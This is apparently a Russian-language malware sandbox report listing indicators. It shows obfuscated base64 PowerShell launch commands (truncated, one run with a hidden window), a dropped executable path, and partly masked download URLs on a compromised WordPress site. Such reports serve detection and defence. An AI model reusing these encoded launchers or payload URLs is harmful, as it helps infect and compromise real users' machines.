Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEYAUgBXAEYAcgBoAG8APQAnAFEATgBCAEoAVwBmAHMAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAUgBpAHQAWQBQAFIAYABvAGAAVABvAGAAQwBvAGwAIgAgAD...
- %HOMEPATH%\915.exe
- http://su###birkin.com/wp-includes/9z9f08/
- http://www.su###birkin.com/wp-includes/9z9f08/
- DNS ASK su###birkin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAEYAUgBXAEYAcgBoAG8APQAnAFEATgBCAEoAVwBmAHMAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBjAHUAUgBpAHQAWQBQAFIAYABvAGAAVABvAGAAQwBvAGwAIgAgAD...' (со скрытым окном)